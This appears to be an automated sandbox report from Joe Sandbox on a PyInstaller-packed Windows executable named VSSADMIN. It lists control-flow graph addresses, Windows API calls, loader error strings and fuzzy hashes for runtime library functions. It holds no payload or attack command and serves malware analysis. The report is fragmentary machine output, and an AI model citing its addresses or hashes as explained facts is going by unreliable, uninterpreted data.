11 API calls 19188->19189 19191 7ff614c956fe 19189->19191 19193 7ff614c84a4c 45 API calls 19190->19193 19194 7ff614c95709 19190->19194 19192 7ff614c89de0 _invalid_parameter_noinfo 37 API calls 19191->19192 19192->19194 19193->19194 19194->19029 19196 7ff614c84a4c 45 API calls 19195->19196 19197 7ff614c983dd 19196->19197 19200 7ff614c98034 19197->19200 19202 7ff614c98082 19200->19202 19201 7ff614c7adb0 _wfindfirst32i64 8 API calls 19203 7ff614c965b5 19201->19203 19204 7ff614c98109 19202->19204 19206 7ff614c980f4 GetCPInfo 19202->19206 19209 7ff614c9810d 19202->19209 19203->19029 19203->19050 19205 7ff614c8e820 _fread_nolock MultiByteToWideChar 19204->19205 19204->19209 19207 7ff614c981a1 19205->19207 19206->19204 19206->19209 19208 7ff614c8cafc _fread_nolock 12 API calls 19207->19208 19207->19209 19210 7ff614c981d8 19207->19210 19208->19210 19209->19201 19210->19209 19211 7ff614c8e820 _fread_nolock MultiByteToWideChar 19210->19211 19212 7ff614c98246 19211->19212 19213 7ff614c8e820 _fread_nolock MultiByteToWideChar 19212->19213 19222 7ff614c98328 19212->19222 19215 7ff614c9826c 19213->19215 19214 7ff614c89e48 __free_lconv_mon 11 API calls 19214->19209 19216 7ff614c8cafc _fread_nolock 12 API calls 19215->19216 19217 7ff614c98299 19215->19217 19215->19222 19216->19217 19218 7ff614c8e820 _fread_nolock MultiByteToWideChar 19217->19218 19217->19222 19219 7ff614c98310 19218->19219 19220 7ff614c98330 19219->19220 19221 7ff614c98316 19219->19221 19229 7ff614c8e040 19220->19229 19221->19222 19224 7ff614c89e48 __free_lconv_mon 11 API calls 19221->19224 19222->19209 19222->19214 19224->19222 19226 7ff614c9836f 19226->19209 19228 7ff614c89e48 __free_lconv_mon 11 API calls 19226->19228 19227 7ff614c89e48 __free_lconv_mon 11 API calls 19227->19226 19228->19209 19230 7ff614c8dde8 __crtLCMapStringW 5 API calls 19229->19230 19231 7ff614c8e07e 19230->19231 19232 7ff614c8e086 19231->19232 19233 7ff614c8e2a8 __crtLCMapStringW 5 API calls 19231->19233 19232->19226 19232->19227 19234 7ff614c8e0ef CompareStringW 19233->19234 19234->19232 19236 7ff614c96ff1 19235->19236 19237 7ff614c9700a HeapSize 19235->19237 19238 7ff614c84474 _set_fmode 11 API calls 19236->19238 19239 7ff614c96ff6 19238->19239 19240 7ff614c89de0 _invalid_parameter_noinfo 37 API calls 19239->19240 19241 7ff614c97001 19240->19241 19241->19055 19243 7ff614c8f9d1 19242->19243 19244 7ff614c8f9db 19242->19244 19245 7ff614c8cafc _fread_nolock 12 API calls 19243->19245 19246 7ff614c8f9e0 19244->19246 19252 7ff614c8f9e7 _set_fmode 19244->19252 19250 7ff614c8f9d9 19245->19250 19247 7ff614c89e48 __free_lconv_mon 11 API calls 19246->19247 19247->19250 19248 7ff614c8fa1a HeapReAlloc 19248->19250 19248->19252 19249 7ff614c8f9ed 19251 7ff614c84474 _set_fmode 11 API calls 19249->19251 19250->19059 19251->19250 19252->19248 19252->19249 19253 7ff614c926e0 _set_fmode 2 API calls 19252->19253 19253->19252 19255 7ff614c97f9d __crtLCMapStringW 19254->19255 19256 7ff614c9649e 19255->19256 19257 7ff614c8e040 6 API calls 19255->19257 19256->19120 19256->19123 19257->19256 17895 7ff614c887e9 17896 7ff614c89108 45 API calls 17895->17896 17897 7ff614c887ee 17896->17897 17898 7ff614c8885f 17897->17898 17899 7ff614c88815 GetModuleHandleW 17897->17899 17907 7ff614c886ec 17898->17907 17899->17898 17905 7ff614c88822 17899->17905 17905->17898 17921 7ff614c88910 GetModuleHandleExW 17905->17921 17927 7ff614c8f7b8 EnterCriticalSection 17907->17927 17922 7ff614c88944 GetProcAddress 17921->17922 17923 7ff614c8896d 17921->17923 17924 7ff614c88956 17922->17924 17925 7ff614c88972 FreeLibrary 17923->17925 17926 7ff614c88979 17923->17926 17924->17923 17925->17926 17926->17898

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 00007FF614C94E50 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 334timeCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 135 7ff614c94e50-7ff614c94e8b call 7ff614c947d8 call 7ff614c947e0 call 7ff614c94848 142 7ff614c94e91-7ff614c94e9c call 7ff614c947e8 135->142 143 7ff614c950b5-7ff614c95101 call 7ff614c89e00 call 7ff614c947d8 call 7ff614c947e0 call 7ff614c94848 135->143 142->143 148 7ff614c94ea2-7ff614c94eac 142->148 168 7ff614c9523f-7ff614c952ad call 7ff614c89e00 call 7ff614c906e8 143->168 169 7ff614c95107-7ff614c95112 call 7ff614c947e8 143->169 150 7ff614c94ece-7ff614c94ed2 148->150 151 7ff614c94eae-7ff614c94eb1 148->151 155 7ff614c94ed5-7ff614c94edd 150->155 153 7ff614c94eb4-7ff614c94ebf 151->153 156 7ff614c94ec1-7ff614c94ec8 153->156 157 7ff614c94eca-7ff614c94ecc 153->157 155->155 159 7ff614c94edf-7ff614c94ef2 call 7ff614c8cafc 155->159 156->153 156->157 157->150 161 7ff614c94efb-7ff614c94f09 157->161 166 7ff614c94ef4-7ff614c94ef6 call 7ff614c89e48 159->166 167 7ff614c94f0a-7ff614c94f16 call 7ff614c89e48 159->167 166->161 176 7ff614c94f1d-7ff614c94f25 167->176 189 7ff614c952af-7ff614c952b6 168->189 190 7ff614c952bb-7ff614c952be 168->190 169->168 178 7ff614c95118-7ff614c95123 call 7ff614c94818 169->178 176->176 179 7ff614c94f27-7ff614c94f38 call 7ff614c8f954 176->179 178->168 187 7ff614c95129-7ff614c9514c call 7ff614c89e48 GetTimeZoneInformation 178->187 179->143 188 7ff614c94f3e-7ff614c94f94 call 7ff614c7c240 * 4 call 7ff614c94d6c 179->188 205 7ff614c95152-7ff614c95173 187->205 206 7ff614c95214-7ff614c9523e call 7ff614c947d0 call 7ff614c947c0 call 7ff614c947c8 187->206 247 7ff614c94f96-7ff614c94f9a 188->247 195 7ff614c9534b-7ff614c9534e 189->195 191 7ff614c952c0 190->191 192 7ff614c952f5-7ff614c95308 call 7ff614c8cafc 190->192 196 7ff614c952c3 191->196 210 7ff614c95313-7ff614c9532e call 7ff614c906e8 192->210 211 7ff614c9530a 192->211 195->196 197 7ff614c95354-7ff614c9535c call 7ff614c94e50 195->197 201 7ff614c952c8-7ff614c952f4 call 7ff614c89e48 call 7ff614c7adb0 196->201 202 7ff614c952c3 call 7ff614c950cc 196->202 197->201 202->201 212 7ff614c9517e-7ff614c95185 205->212 213 7ff614c95175-7ff614c9517b 205->213 230 7ff614c95330-7ff614c95333 210->230 231 7ff614c95335-7ff614c95347 call 7ff614c89e48 210->231 217 7ff614c9530c-7ff614c95311 call 7ff614c89e48 211->217 219 7ff614c95187-7ff614c9518f 212->219 220 7ff614c95199 212->220 213->212 217->191 219->220 229 7ff614c95191-7ff614c95197 219->229 225 7ff614c9519b-7ff614c9520f call 7ff614c7c240 * 4 call 7ff614c91cac call 7ff614c95364 * 2 220->225 225->206 229->225 230->217 231->195 249 7ff614c94fa0-7ff614c94fa4 247->249 250 7ff614c94f9c 247->250 249->247 252 7ff614c94fa6-7ff614c94fcb call 7ff614c97c94 249->252 250->249 258 7ff614c94fce-7ff614c94fd2 252->258 260 7ff614c94fe1-7ff614c94fe5 258->260 261 7ff614c94fd4-7ff614c94fdf 258->261 260->258 261->260 263 7ff614c94fe7-7ff614c94feb 261->263 266 7ff614c9506c-7ff614c95070 263->266 267 7ff614c94fed-7ff614c95015 call 7ff614c97c94 263->267 269 7ff614c95072-7ff614c95074 266->269 270 7ff614c95077-7ff614c95084 266->270 275 7ff614c95033-7ff614c95037 267->275 276 7ff614c95017 267->276 269->270 272 7ff614c9509f-7ff614c950ae call 7ff614c947d0 call 7ff614c947c0 270->272 273 7ff614c95086-7ff614c9509c call 7ff614c94d6c 270->273 272->143 273->272 275->266 281 7ff614c95039-7ff614c95057 call 7ff614c97c94 275->281 279 7ff614c9501a-7ff614c95021 276->279 279->275 282 7ff614c95023-7ff614c95031 279->282 287 7ff614c95063-7ff614c9506a 281->287 282->275 282->279 287->266 288 7ff614c95059-7ff614c9505d 287->288 288->266 289 7ff614c9505f 288->289 289->287
                                                                                                                                                                      APIs
                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF614C94E95
                                                                                                                                                                        • Part of subcall function 00007FF614C947E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF614C947FC
                                                                                                                                                                        • Part of subcall function 00007FF614C89E48: RtlReleasePrivilege.NTDLL(?,?,?,00007FF614C91E72,?,?,?,00007FF614C91EAF,?,?,00000000,00007FF614C92375,?,?,?,00007FF614C922A7), ref: 00007FF614C89E5E
                                                                                                                                                                        • Part of subcall function 00007FF614C89E48: GetLastError.KERNEL32(?,?,?,00007FF614C91E72,?,?,?,00007FF614C91EAF,?,?,00000000,00007FF614C92375,?,?,?,00007FF614C922A7), ref: 00007FF614C89E68
                                                                                                                                                                        • Part of subcall function 00007FF614C89E00: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF614C89DDF,?,?,?,?,?,00007FF614C8221C), ref: 00007FF614C89E09
                                                                                                                                                                        • Part of subcall function 00007FF614C89E00: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF614C89DDF,?,?,?,?,?,00007FF614C8221C), ref: 00007FF614C89E2E
                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF614C94E84
                                                                                                                                                                        • Part of subcall function 00007FF614C94848: _invalid_parameter_noinfo.LIBCMT ref: 00007FF614C9485C
                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF614C950FA
                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF614C9510B
                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF614C9511C
                                                                                                                                                                      • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF614C9535C), ref: 00007FF614C95143
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureInformationLastPresentPrivilegeProcessProcessorReleaseTimeZone
                                                                                                                                                                      • String ID: W. Europe Daylight Time$W. Europe Standard Time
                                                                                                                                                                      • API String ID: 415722205-986674615
                                                                                                                                                                      • Opcode ID: 33e166344f1c2e2cd7caacd2227ecf44b8e0e081e44327976083296b7a0746f2
                                                                                                                                                                      • Instruction ID: cb42433b5953b0dda67b1e0089ff244890e0d84ac0495b15073d0d30240f97a8
                                                                                                                                                                      • Opcode Fuzzy Hash: 33e166344f1c2e2cd7caacd2227ecf44b8e0e081e44327976083296b7a0746f2
                                                                                                                                                                      • Instruction Fuzzy Hash: 3BD1C126E08A4296E7249F25D4D01B967B1FF56FA8F448137EA0DC7A85DF3DE841C740
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C95D9C Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 320 7ff614c95d9c-7ff614c95e0f call 7ff614c95ad0 323 7ff614c95e11-7ff614c95e1a call 7ff614c84454 320->323 324 7ff614c95e29-7ff614c95e33 call 7ff614c86d2c 320->324 329 7ff614c95e1d-7ff614c95e24 call 7ff614c84474 323->329 330 7ff614c95e4e-7ff614c95eb7 CreateFileW 324->330 331 7ff614c95e35-7ff614c95e4c call 7ff614c84454 call 7ff614c84474 324->331 347 7ff614c9616a-7ff614c9618a 329->347 333 7ff614c95f34-7ff614c95f3f GetFileType 330->333 334 7ff614c95eb9-7ff614c95ebf 330->334 331->329 340 7ff614c95f41-7ff614c95f7c GetLastError call 7ff614c843e8 CloseHandle 333->340 341 7ff614c95f92-7ff614c95f99 333->341 337 7ff614c95f01-7ff614c95f2f GetLastError call 7ff614c843e8 334->337 338 7ff614c95ec1-7ff614c95ec5 334->338 337->329 338->337 345 7ff614c95ec7-7ff614c95eff CreateFileW 338->345 340->329 355 7ff614c95f82-7ff614c95f8d call 7ff614c84474 340->355 343 7ff614c95fa1-7ff614c95fa4 341->343 344 7ff614c95f9b-7ff614c95f9f 341->344 350 7ff614c95faa-7ff614c95fff call 7ff614c86c44 343->350 351 7ff614c95fa6 343->351 344->350 345->333 345->337 359 7ff614c9601e-7ff614c9604f call 7ff614c95850 350->359 360 7ff614c96001-7ff614c9600d call 7ff614c95cd8 350->360 351->350 355->329 365 7ff614c96051-7ff614c96053 359->365 366 7ff614c96055-7ff614c96097 359->366 360->359 367 7ff614c9600f 360->367 368 7ff614c96011-7ff614c96019 call 7ff614c89fc0 365->368 369 7ff614c960b9-7ff614c960c4 366->369 370 7ff614c96099-7ff614c9609d 366->370 367->368 368->347 372 7ff614c96168 369->372 373 7ff614c960ca-7ff614c960ce 369->373 370->369 371 7ff614c9609f-7ff614c960b4 370->371 371->369 372->347 373->372 375 7ff614c960d4-7ff614c96119 CloseHandle CreateFileW 373->375 377 7ff614c9614e-7ff614c96163 375->377 378 7ff614c9611b-7ff614c96149 GetLastError call 7ff614c843e8 call 7ff614c86e6c 375->378 377->372 378->377
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1617910340-0
                                                                                                                                                                      • Opcode ID: 4c9dcb694f9da37b9569774e6528ce897b09f0f884fc50d365155145b1bc53bc
                                                                                                                                                                      • Instruction ID: b68f983b892a7b5db8c62fe9801dbb15b0ac0717b6815dec5b91bd7101bebb8a
                                                                                                                                                                      • Opcode Fuzzy Hash: 4c9dcb694f9da37b9569774e6528ce897b09f0f884fc50d365155145b1bc53bc
                                                                                                                                                                      • Instruction Fuzzy Hash: AFC1AD37B28E4295EB10CF68C4D06AC3771EB5AFA8B01523ADA2E97795DF3AD551C300
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C767A0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 141COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetTempPathW.KERNEL32(?,?,00000000,?,?,00007FF614C7676D), ref: 00007FF614C76837
                                                                                                                                                                        • Part of subcall function 00007FF614C769B0: GetEnvironmentVariableW.KERNEL32(00007FF614C73707), ref: 00007FF614C769EA
                                                                                                                                                                        • Part of subcall function 00007FF614C769B0: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF614C76A07
                                                                                                                                                                        • Part of subcall function 00007FF614C866E4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF614C866FD
                                                                                                                                                                      • SetEnvironmentVariableW.KERNEL32(?,?,00000000,?,?,00007FF614C7676D), ref: 00007FF614C768F1
                                                                                                                                                                        • Part of subcall function 00007FF614C72770: MessageBoxW.USER32 ref: 00007FF614C72845
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
                                                                                                                                                                      • String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
                                                                                                                                                                      • API String ID: 3752271684-1116378104
                                                                                                                                                                      • Opcode ID: 1a0ee3ea3cf854b8610bb8cc6340f268ff9651d41f5ec51d8c7de28d4373f64b
                                                                                                                                                                      • Instruction ID: 1cae1ea25543fdb881c81395485c0a068bf470262e7b5c1990f7eaaaa6251334
                                                                                                                                                                      • Opcode Fuzzy Hash: 1a0ee3ea3cf854b8610bb8cc6340f268ff9651d41f5ec51d8c7de28d4373f64b
                                                                                                                                                                      • Instruction Fuzzy Hash: 29515D21B0DA4392FE14A776A9952BAA2619F47FF1F445037ED0ECB797EE2DE4018300
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C950CC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143timeCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 798 7ff614c950cc-7ff614c95101 call 7ff614c947d8 call 7ff614c947e0 call 7ff614c94848 805 7ff614c9523f-7ff614c952ad call 7ff614c89e00 call 7ff614c906e8 798->805 806 7ff614c95107-7ff614c95112 call 7ff614c947e8 798->806 818 7ff614c952af-7ff614c952b6 805->818 819 7ff614c952bb-7ff614c952be 805->819 806->805 811 7ff614c95118-7ff614c95123 call 7ff614c94818 806->811 811->805 817 7ff614c95129-7ff614c9514c call 7ff614c89e48 GetTimeZoneInformation 811->817 832 7ff614c95152-7ff614c95173 817->832 833 7ff614c95214-7ff614c9523e call 7ff614c947d0 call 7ff614c947c0 call 7ff614c947c8 817->833 823 7ff614c9534b-7ff614c9534e 818->823 820 7ff614c952c0 819->820 821 7ff614c952f5-7ff614c95308 call 7ff614c8cafc 819->821 824 7ff614c952c3 820->824 836 7ff614c95313-7ff614c9532e call 7ff614c906e8 821->836 837 7ff614c9530a 821->837 823->824 825 7ff614c95354-7ff614c9535c call 7ff614c94e50 823->825 828 7ff614c952c8-7ff614c952f4 call 7ff614c89e48 call 7ff614c7adb0 824->828 829 7ff614c952c3 call 7ff614c950cc 824->829 825->828 829->828 838 7ff614c9517e-7ff614c95185 832->838 839 7ff614c95175-7ff614c9517b 832->839 853 7ff614c95330-7ff614c95333 836->853 854 7ff614c95335-7ff614c95347 call 7ff614c89e48 836->854 842 7ff614c9530c-7ff614c95311 call 7ff614c89e48 837->842 844 7ff614c95187-7ff614c9518f 838->844 845 7ff614c95199 838->845 839->838 842->820 844->845 852 7ff614c95191-7ff614c95197 844->852 848 7ff614c9519b-7ff614c9520f call 7ff614c7c240 * 4 call 7ff614c91cac call 7ff614c95364 * 2 845->848 848->833 852->848 853->842 854->823
                                                                                                                                                                      APIs
                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF614C950FA
                                                                                                                                                                        • Part of subcall function 00007FF614C94848: _invalid_parameter_noinfo.LIBCMT ref: 00007FF614C9485C
                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF614C9510B
                                                                                                                                                                        • Part of subcall function 00007FF614C947E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF614C947FC
                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF614C9511C
                                                                                                                                                                        • Part of subcall function 00007FF614C94818: _invalid_parameter_noinfo.LIBCMT ref: 00007FF614C9482C
                                                                                                                                                                        • Part of subcall function 00007FF614C89E48: RtlReleasePrivilege.NTDLL(?,?,?,00007FF614C91E72,?,?,?,00007FF614C91EAF,?,?,00000000,00007FF614C92375,?,?,?,00007FF614C922A7), ref: 00007FF614C89E5E
                                                                                                                                                                        • Part of subcall function 00007FF614C89E48: GetLastError.KERNEL32(?,?,?,00007FF614C91E72,?,?,?,00007FF614C91EAF,?,?,00000000,00007FF614C92375,?,?,?,00007FF614C922A7), ref: 00007FF614C89E68
                                                                                                                                                                      • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF614C9535C), ref: 00007FF614C95143
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _get_daylight_invalid_parameter_noinfo$ErrorInformationLastPrivilegeReleaseTimeZone
                                                                                                                                                                      • String ID: W. Europe Daylight Time$W. Europe Standard Time
                                                                                                                                                                      • API String ID: 1182710636-986674615
                                                                                                                                                                      • Opcode ID: 51ad445c25b45f3d776946b5c57fad9b99f7b138fe1ab62d11b9ea19d7bbbd5c
                                                                                                                                                                      • Instruction ID: 3467c06d292c2f9e9a3e86a1de5ffc1b2cf8cfba00a850a0ab9599cce632a896
                                                                                                                                                                      • Opcode Fuzzy Hash: 51ad445c25b45f3d776946b5c57fad9b99f7b138fe1ab62d11b9ea19d7bbbd5c
                                                                                                                                                                      • Instruction Fuzzy Hash: B251AD36A08E4296E714DF21E8C15B96770FB5AFA8F408137EA0DC3A96DF3DE4418740
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C7B1B0 Relevance: 3.0, APIs: 2, Instructions: 18COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterUnhandled_invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 59578552-0
                                                                                                                                                                      • Opcode ID: 2d1ec54d9dc1f814aac4ffc56ccc42f9ec7497739519b971d77b754768042176
                                                                                                                                                                      • Instruction ID: 8589a500f0291bc674069ddf769efa1a77272bf0df5498fe465d48b40ae2e558
                                                                                                                                                                      • Opcode Fuzzy Hash: 2d1ec54d9dc1f814aac4ffc56ccc42f9ec7497739519b971d77b754768042176
                                                                                                                                                                      • Instruction Fuzzy Hash: 6EE0B670E1D94382F61876A95CC30BE10B05F97B30FA0023BE11AC7AD2CD6D2592AA26
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C717B0 Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 144COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _fread_nolock$Message_invalid_parameter_noinfo
                                                                                                                                                                      • String ID: Cannot read Table of Contents.$Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
                                                                                                                                                                      • API String ID: 2153230061-4158440160
                                                                                                                                                                      • Opcode ID: 74b152d2f2539e24a2e932bae29537e2be075208bf4e50edcea38641dca22453
                                                                                                                                                                      • Instruction ID: fc024c6191311fc2d0b1db3c8f92be47550509f0b7b486c87cb3a172f5e39cb1
                                                                                                                                                                      • Opcode Fuzzy Hash: 74b152d2f2539e24a2e932bae29537e2be075208bf4e50edcea38641dca22453
                                                                                                                                                                      • Instruction Fuzzy Hash: 9A514772A1DE0286EB54CF28D4D127823B1EB8AF69B518137DA0DC3799DE3CE541C740
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C71440 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 133COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
